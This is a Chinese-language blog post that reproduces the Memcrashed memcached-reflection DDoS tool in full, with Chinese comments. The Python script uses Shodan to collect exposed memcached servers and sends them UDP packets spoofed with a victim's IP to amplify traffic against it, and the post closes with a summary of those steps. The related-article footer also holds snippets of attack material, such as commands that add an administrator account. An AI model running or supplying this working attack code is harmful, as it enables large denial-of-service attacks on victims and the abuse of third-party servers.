0x00前言:

距离世界上最大的Drdos攻击已经过去了两个星期左右

昨天在交流的时候。群友在Github中找到了exploit。

0x01开始:

#-- coding: utf8 --

#!/usr/bin/env python3

import sys, os, time, shodan #导入sys,shodan,os,time模块

from pathlib import Path #从pathlib模块中导入Path

from scapy.all import * #导入scapy

from contextlib import contextmanager, redirect_stdout #从contextlib模块中导入 contextmanager, redirect_stdout

starttime = time.time() #设置时间点

@contextmanager

def suppress_stdout():

    with open(os.devnull, "w") as devnull: #不同设备下的null路径

        with redirect_stdout(devnull):

            yield 

class color:

    HEADER = '\033[0m' #背景颜色字符串

keys = Path("./api.txt") #搜索API.txt

logo = color.HEADER + ''' #好看的标题

   ███╗   ███╗███████╗███╗   ███╗ ██████╗██████╗  █████╗ ███████╗██╗  ██╗███████╗██████╗

   ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║██╔════╝██╔══██╗

   ██╔████╔██║█████╗  ██╔████╔██║██║     ██████╔╝███████║███████╗███████║█████╗  ██║  ██║

   ██║╚██╔╝██║██╔══╝  ██║╚██╔╝██║██║     ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝  ██║  ██║

   ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║  ██║██║  ██║███████║██║  ██║███████╗██████╔╝

   ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝

                                        Author: @037

                                        Version: 3.2

####################################### DISCLAIMER ########################################

| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable  |

| memcached servers. It then allows you to use the same servers to launch widespread      |

| distributed denial of service attacks by forging UDP packets sourced to your victim.    |

| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |

| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.   |

| I am NOT responsible for any damages caused or any crimes committed by using this tool. |

###########################################################################################

'''

print(logo) #输出好看的标题 = =

if keys.is_file(): #如果路径下有这个文件的话

    with open('api.txt', 'r') as file: #读取API.txt

        SHODAN_API_KEY=file.readline().rstrip('\n') #每行读取删除换行符

else: #如果没有这个文件

    file = open('api.txt', 'w') #新建API.txt

    SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') #等待用户输入

    file.write(SHODAN_API_KEY) #写入用户输入的东西

    print('[~] File written: ./api.txt') #这个就不说了 = =

    file.close() #关闭文件

while True:

    api = shodan.Shodan(SHODAN_API_KEY) #你的shodan Key

    print('') #= =

    try:

        myresults = Path("./bots.txt") #搜索bots.txt

        query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower() #等待用户输入,将输入转化为小写

        if query.startswith('y'): #如果用户输入的是y

            print('')

            print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)

            results = api.search('product:"Memcached" port:11211') #从shodan中搜索Memcached服务,并且端口是11211的

            print('[✓] API Key Authentication: SUCCESS')

            print('[~] Number of bots: %s' % results['total'])

            print('')

            saveresult = input("[*] Save results for later usage? <Y/n>: ").lower() #等待用户输入,将输入转化为小写

            if saveresult.startswith('y'): #如果是y

                file2 = open('bots.txt', 'a') #打开bots.txt

                for result in results['matches']: #变量shodan搜索到的结果

                    file2.write(result['ip_str'] + "\n") #将搜索到的IP写入bots.txt

                print('[~] File written: ./bots.txt')

                print('')

                file2.close() #关闭文件

        saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower() #等待用户输入将输入的转为小写

        if myresults.is_file(): #如果路径下有bots.txt

            if saveme.startswith('y'): #用户输入为y

                with open('bots.txt') as my_file: #读取bots.txt

                    ip_array = [line.rstrip() for line in my_file] #读取IP

        else: #如果路径下没有这个txt

            print('')

            print('[✘] Error: No bots stored locally, bots.txt file not found!')

            print('')

        if saveme.startswith('y') or query.startswith('y'): #两个任意一个为y的话

            print('')

            target = input("[▸] Enter target IP address: ") #等待用户输入

            power = int(input("[▸] Enter preferred power (Default 1): ") or "1")

            data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"

            print('')

            if query.startswith('y'): #如果输入为y的话

                iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower() #等待输入

                if iplist.startswith('y'): #输入为y的话

                    print('')

                    counter= int(0)

                    for result in results['matches']: #遍历shodan搜索的结果

                        host = api.host('%s' % result['ip_str']) #输入IP

                        counter=counter+1

                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))

                        time.sleep(1.1 - ((time.time() - starttime) % 1.1))

            if saveme.startswith('y'): #为y的话

                iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower() #等待输入

                if iplistlocal.startswith('y'): #输入为y的话

                    print('')

                    counter= int(0)

                    for x in ip_array:

                        host = api.host('%s' % x)

                        counter=counter+1

                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))

                        time.sleep(1.1 - ((time.time() - starttime) % 1.1)) #延迟一秒钟,并减去开始的时间

            print('')

            engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower() #等待用户输入

            if engage.startswith('y'): #如果为y

                if saveme.startswith('y'): #如果为y

                    for i in ip_array: #遍历ip_array

                        if power>1: #如果power大于1

                            print('[+] Sending %d forged UDP packets to: %s' % (power, i))

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)

                        elif power==1:#如果power等于1

                            print('[+] Sending 1 forged UDP packet to: %s' % i)

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP向Memcrashed发送数据

                else: #如果两个都不是

                    for result in results['matches']:

                        if power>1: #如果power大于1

                            print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据

                        elif power==1: #如果power等于1

                            print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据

                print('')

                print('[•] Task complete! Exiting Platform. Have a wonderful day.')

                break

            else:

                print('')

                print('[✘] Error: %s not engaged!' % target)

                print('[~] Restarting Platform! Please wait.')

                print('')

        else:

            print('')

            print('[✘] Error: No bots stored locally or remotely on Shodan!')

            print('[~] Restarting Platform! Please wait.')

            print('')

    except shodan.APIError as e:

            print('[✘] Error: %s' % e)

            option = input('[*] Would you like to change API Key? <Y/n>: ').lower() #等待输入

            if option.startswith('y'): #如果为y

                file = open('api.txt', 'w') #新建api.txt

                SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ') #输入您的shodan可以

                file.write(SHODAN_API_KEY) #加入到文件

                print('[~] File written: ./api.txt')

                file.close() #关闭文件

                print('[~] Restarting Platform! Please wait.')

                print('')

            else: #如果不是

                print('')

                print('[•] Exiting Platform. Have a wonderful day.')

                break

向Memcrashed发送的数据: \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

Memcrashed exploit地址:https://github.com/649/Memcrashed-DDoS-Exploit

0x02分析完代码获取到的思路:

1.从shodan中获取开放了11211的Memcrashed的服务的IP

2.遍历shodana获取到的IP写入到文件

3.遍历写人IP的文件

4.伪造源IP向遍历的IP发送数据:\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

审核Memcrashed Drdos攻击代码的更多相关文章

  1. 关于Memcached反射型DRDoS攻击分析

    一.Memcached反射攻击原理 1.反射DRDoS攻击: DRDoS攻击时DoS攻击的一种,DoS是指通过发送或引发大量的资源消耗导致服务不可用的一种攻击方式,中文称之为拒绝服务攻击.DRDoS是 ...

  2. 判断字符串中是否有SQL攻击代码

    判断一个输入框中是否有SQL攻击代码 public const string SQLSTR2 = @"exec|cast|convert|set|insert|select|delete|u ...

  3. PHP防CC攻击代码

    PHP防CC攻击代码: empty($_SERVER['HTTP_VIA']) or exit('Access Denied'); //代理IP直接退出 session_start(); $secon ...

  4. ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl 漏洞及攻击代码分析

    攻击代码网址:http://www.exploit-db.com/exploits/394/ 1.执行环境: 1.ProFTPD 1.3.0/1.3.0a 2.编译ProFTPD时.--enable- ...

  5. DOS、DOS攻击、DDOS攻击、DRDOS攻击

    https://baike.baidu.com/item/dos%E6%94%BB%E5%87%BB/3792374?fr=aladdin DOS:中文名称是拒绝服务,一切能引起DOS行为的攻击都被称 ...

  6. 常见的XSS攻击代码

    第一类: <tag on*=*/> 在html标签事件中触发,典型的是on*事件,但是这种触发模式的缺陷在于不能直接触发所以更多的需要配合使用. eg: 1.使html元素占据整个显示页面 ...

  7. mysql相关攻击代码收集

    1.批处理文件内容 @echo off net user li /add net user li /active:yes net localgroup Administrators li /add 2 ...

  8. php--防止DDos攻击代码

    <?php //查询禁止IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fil ...

  9. PHP攻击网站防御代码-以及攻击代码反译

    <?php //查询禁止IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fil ...

随机推荐

  1. C# 使用AngleSharp 爬虫图片

    AngleSharp 简介 AngleSharp是基于.NET(C#)开发的专门解析HTML源码的DLL组件.根据HTML的DOM结构操作HTML,整个DOM已传输到逻辑类结构中.这种结构可以更好的操 ...

  2. C语言队列(数组内核)

    #include <stdio.h>#include <stdbool.h>#include <stdlib.h>struct Queue{ int *pBase; ...

  3. Linux下yum安装MysqL数据库

    1.命令安装mysql # yum install mysql mysql-server mysql-devel -y 最后提示 Complete!  表示安装成功 2.查看是否生成了mysqld服务 ...

  4. dubbox系列【三】——简单的dubbox提供者+消费者示例

    1.dubbox-provider示例 在eclipse中建立maven project,名为provider-parent,包含两个maven medule:provider-api 和 provi ...

  5. 2017第八届蓝桥杯 K倍区间

    标题: k倍区间 给定一个长度为N的数列,A1, A2, - AN,如果其中一段连续的子序列Ai, Ai+1, - Aj(i <= j)之和是K的倍数,我们就称这个区间[i, j]是K倍区间. ...

  6. flask项目开发中,遇到http 413错误

    在flask项目中,上传文件时后台报http 413 Request Entity Too Large 请求体太大错误! 解决的2种方法: 1.在flask配置中设置 MAX_CONTENT_LENG ...

  7. H3C三层交换机配置IP

    1.直接在物理端口上设置IP地址. int f1/0/1 port link-mode route #链路模式采用路由 ip add 192.168.10.1 24 ospf network0type ...

  8. 【java学习笔记】反射基础

    一.反射 反射就是在剖析一个类,了解这个类的构造,创建这个类对应的对象. Class 代表字节码的类,代表类的类 Field 代表属性的类 Method 代表方法的类 Constructor 代表构造 ...

  9. The Windows account sa does not exist and cannot be provisioned as a SQL Server system administrator

    今天遇到一个案例,在使用命令修改一个测试服务器(SQL Server 2014标准版)的服务器排序规则时,遇到了下面错误信息 (具体账号信息脱敏处理,随机生成一个账号密码) The Windows a ...

  10. PHP openssl函数库

    php openssl 函数库中.提供了大量的函数.但是我们一般用的最多的,就是 openssl_encrypt string openssl_encrypt ( string $data , str ...